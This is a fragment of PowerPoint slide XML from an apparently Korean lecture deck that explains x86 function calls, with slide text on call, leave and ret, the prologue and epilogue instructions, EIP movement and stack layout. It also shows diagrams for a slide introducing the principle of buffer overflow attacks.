            <a:endParaRPr lang="ko-KR" altLang="ko-K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3934A-DF44-45DA-8F1D-C7A8DA358EA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4385607" y="2091190"/>
            <a:ext cx="2414726" cy="26379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FA8BC7-71AC-4E36-8049-222100FDF327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4305300" y="4629150"/>
            <a:ext cx="2575340" cy="15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7985A-B828-46B3-BEA2-9E36BA7C9BFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4385607" y="2091188"/>
            <a:ext cx="2414726" cy="1480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 가용 공간 생성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E8ED58-8798-44D2-B70B-3CF489C4BDE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6880640" y="1783265"/>
            <a:ext cx="860963" cy="61584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42E01FA1-B719-4713-A333-562D089559A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7934326" y="2091188"/>
            <a:ext cx="323850" cy="1480687"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 26700"/>
              <a:gd name="adj2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F064-2044-4989-9E94-1B6977BF619D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8327593" y="264686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6.25E-7 0.218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9531D69D-93AF-4F00-A1D3-C1B2BBCCB94A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="229970"/>
            <a:ext cx="54104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/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>call   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>함수의 주소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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>해당 함수를 호출한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-K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3934A-DF44-45DA-8F1D-C7A8DA358EA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6290607" y="2286522"/>
            <a:ext cx="2414726" cy="26379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FA8BC7-71AC-4E36-8049-222100FDF327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6210300" y="4838700"/>
            <a:ext cx="2575340" cy="1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E8ED58-8798-44D2-B70B-3CF489C4BDE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8785640" y="1978597"/>
            <a:ext cx="860963" cy="61584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FFA7A9-1651-48B7-850C-46068EF09358}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992822" y="1055448"/>
            <a:ext cx="2762249" cy="263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void function(int a, int b)</a:t>
            </a:r>
          </a:p>
          <a:p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return;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int main()</a:t>
            </a:r>
          </a:p>
          <a:p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function(1,2);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0A29EC-D6C9-4A47-968E-2AF66A896411}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317158" y="3865418"/>
            <a:ext cx="4673942" cy="2027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</a:t>
            </a:r>
          </a:p>
          <a:p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주소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)             (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>명령어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>오퍼랜드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)   &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>설명문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x00000408  push $0x2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x0000040a  push $0x1</a:t>
            </a:r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0x0000040d  call 0x00000401 &lt;function&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x0000040f   …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8AF223-C645-4B7E-B09B-845A8830F4BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9865867" y="3244334"/>
            <a:ext cx="22845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EIP : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x00000408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6AA68F-1C46-4C16-AC73-86D5B7486BA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9865867" y="3244334"/>
            <a:ext cx="22845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EIP : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x0000040a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906655-0FD4-4469-BB12-4339D4EC0A86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9865867" y="3244334"/>
            <a:ext cx="22845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EIP : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x0000040d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FD2AC-AD0D-47DC-B6DA-2AA69365A84F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9865866" y="3244334"/>
            <a:ext cx="22845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EIP : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x00000401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7985A-B828-46B3-BEA2-9E36BA7C9BFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6290607" y="2286520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D4EC4B-C1DC-4300-8B84-7BCE0CD32363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6290607" y="2601899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17052-BE28-4E06-957E-23FA15B1F4EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6290607" y="2917276"/>
            <a:ext cx="2414726" cy="849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0x0000040f</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3272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6.25E-7 0.046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4606 L 6.25E-7 0.0921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9213 L 6.25E-7 0.2159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16" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="14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9531D69D-93AF-4F00-A1D3-C1B2BBCCB94A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="39470"/>
            <a:ext cx="745325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/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Leave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>함수의 종료 시 에필로그 작업을 해</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>준다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  <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>함수의 종료 시에 사용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>함수를 호출했던 다음 지점으로 이동한다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ko-KR" altLang="ko-KR" sz="20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3934A-DF44-45DA-8F1D-C7A8DA358EA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7062132" y="1774539"/>
            <a:ext cx="2414726" cy="3073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FA8BC7-71AC-4E36-8049-222100FDF327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6981825" y="4768084"/>
            <a:ext cx="2575340" cy="11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E8ED58-8798-44D2-B70B-3CF489C4BDE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9557165" y="2932352"/>
            <a:ext cx="860963" cy="61584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FFA7A9-1651-48B7-850C-46068EF09358}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992822" y="1055448"/>
            <a:ext cx="2762249" cy="263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void function(int a, int b)</a:t>
            </a:r>
          </a:p>
          <a:p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return;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int main()</a:t>
            </a:r>
          </a:p>
          <a:p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function(1,2);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0A29EC-D6C9-4A47-968E-2AF66A896411}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654988" y="3973062"/>
            <a:ext cx="3437913" cy="1919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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x00000401  push %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp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0x00000403  mov %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp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…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x0000041b  leave</a:t>
            </a:r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0x0000041e  ret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8AF223-C645-4B7E-B09B-845A8830F4BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231661" y="6097109"/>
            <a:ext cx="22845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EIP : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x00000401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17E8A4-7C97-4AE5-B8B5-6481B9799626}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4021282" y="4306206"/>
            <a:ext cx="1186238" cy="469258"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 59280"/>
              <a:gd name="adj2" fmla="val 453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프롤로그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B876BDC-67F5-4750-B5B4-ACF112ACA92F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4021282" y="4962375"/>
            <a:ext cx="1186238" cy="469258"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 59280"/>
              <a:gd name="adj2" fmla="val 453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에필로그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477FBEBC-ED41-4978-B340-6BF75D21C66E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5097295" y="5477343"/>
            <a:ext cx="2990850" cy="997879"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -39254"/>
              <a:gd name="adj2" fmla="val -564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mov %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp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pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp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7985A-B828-46B3-BEA2-9E36BA7C9BFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7062132" y="1774538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D4EC4B-C1DC-4300-8B84-7BCE0CD32363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7062132" y="2089917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17052-BE28-4E06-957E-23FA15B1F4EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7062132" y="2405294"/>
            <a:ext cx="2414726" cy="849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0x0000040f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231C1B-2546-4F73-ACC5-677B90A8DB84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7062132" y="3245658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main()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E1239E-A873-43DE-A2D3-1EB2B736508E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231661" y="6097109"/>
            <a:ext cx="228456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EIP : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x0000040f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9A62D-AD8C-49C5-B3EC-6AEDDAB4097C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2145374" y="4217811"/>
            <a:ext cx="1875908" cy="646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13A3C-125E-46C4-B910-7D087CE1053C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10623315" y="2563020"/>
            <a:ext cx="1151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pop %eip</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/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DDA3625B-ADB1-4083-991D-8A9E63EAD9C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10768696" y="2317204"/>
            <a:ext cx="860963" cy="860963"/>
          </a:xfrm>
          <a:prstGeom prst="noSmoking">
            <a:avLst>
              <a:gd name="adj" fmla="val 4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3.7037E-6 L -6.25E-7 0.0467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065 0.03936 L -0.00065 0.03936 C -0.00378 0.07778 -0.00156 0.03982 -0.00156 0.08519 C -0.00156 0.11667 -0.00195 0.14815 -0.00234 0.17963 C -0.00247 0.1926 -0.00273 0.20556 -0.00312 0.21829 C -0.00391 0.2419 -0.00443 0.24838 -0.0056 0.26713 C -0.00508 0.24514 -0.00534 0.22315 -0.00391 0.20116 C -0.00351 0.19537 -0.0026 0.2125 -0.00234 0.21829 C 0.0013 0.28496 -0.00417 0.2125 0.00013 0.26574 C 0.00039 0.2757 0.00091 0.30579 0.00091 0.29584 C 0.00091 0.20278 0.00195 0.22477 -0.00065 0.17824 C -0.0013 0.18218 -0.00195 0.18588 -0.00234 0.18982 C -0.00325 0.19838 -0.00469 0.21551 -0.00469 0.21551 C -0.00586 0.25672 -0.00612 0.24954 -0.00469 0.30162 C -0.00469 0.30394 -0.00404 0.30625 -0.00391 0.3088 C -0.00378 0.31343 -0.00391 0.31829 -0.00391 0.32315 L -0.00391 0.32315 " pathEditMode="relative" ptsTypes="AAAAAAAAAAAAAAAAA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1198 0.16528 L -0.00221 0.0493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0.04676 L -6.25E-7 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3.7037E-6 L -6.25E-7 -0.1217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15" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="1" animBg="1"/>
      <p:bldP spid="25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191DEE-42A2-4F92-BC2D-78B65C36F85A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="919805" y="2972777"/>
            <a:ext cx="3419659" cy="15598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 연산 작업을 하는 데 있어 필요한 데이터를 일시적으로 메모리에 저장해 놓은 공간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21396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BOF </a:t>
            </a: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공격의 원리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CA2930-3395-461E-963D-701A60A13320}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5821270" y="1298698"/>
            <a:ext cx="2414726" cy="4586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970B4-6540-4371-A8AF-CF344CF24C56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5740963" y="5827351"/>
            <a:ext cx="2575340" cy="11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BD2BD6-967F-4C53-9A91-393C541B329E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5821270" y="1298697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75D2A-39FF-4BB3-BEB4-FD4B8DDE2D64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5821270" y="1614076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2B188D-A3E1-4F76-8D1B-4CDD06247D77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5821270" y="1929453"/>
            <a:ext cx="2414726" cy="897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0x0000040f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594325-AB28-4860-85B5-ABDE1B71043B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5821270" y="2829084"/>
            <a:ext cx="2414726" cy="413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main()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A34959-417D-46D2-8FA0-51C4D555A1C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1641494" y="2769817"/>
            <a:ext cx="1976283" cy="40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Buffer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CD4728-CEEA-4C9F-A071-BEC0D8C2BE0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5821270" y="3242674"/>
            <a:ext cx="2414726" cy="173474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Buffer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D48DD2-785C-447C-BA20-C032AB82BAD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8007394" y="4748821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B9339-C55C-41E4-A338-84802DE8C811}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8007393" y="4571597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CA837-4EF5-4720-9E38-97E44517EB74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8007393" y="4371571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F07D27-8C92-4813-96C0-B637DB798DAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8007393" y="4171545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A5D77B-657E-4C77-8CFA-15734C5F089D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8007393" y="3998727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AEC568-35F1-4F24-BA0B-F3EC88393B00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8007393" y="3796498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29E6E9-2D9E-4E5C-8A80-9EE38757672E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8007393" y="3596472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5BE376-E5A7-43A2-8D13-93A93EBE6C0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8007393" y="3396446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BEACF5-D961-47F8-9E53-FC6D4403B227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8007393" y="3223628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D20842-879A-423D-96AE-9259F96656DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8007393" y="3026907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B736B-09C0-4450-B6E9-D3888A3092AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8007393" y="2824678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6FD6F-291A-48A6-80F9-59916900A4B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8007393" y="2624652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05B1A9-0FAC-4E7E-A7E5-7973180A8C60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8007393" y="2424626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346AD8-FB9F-4ED9-BDC9-CD17827A78C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
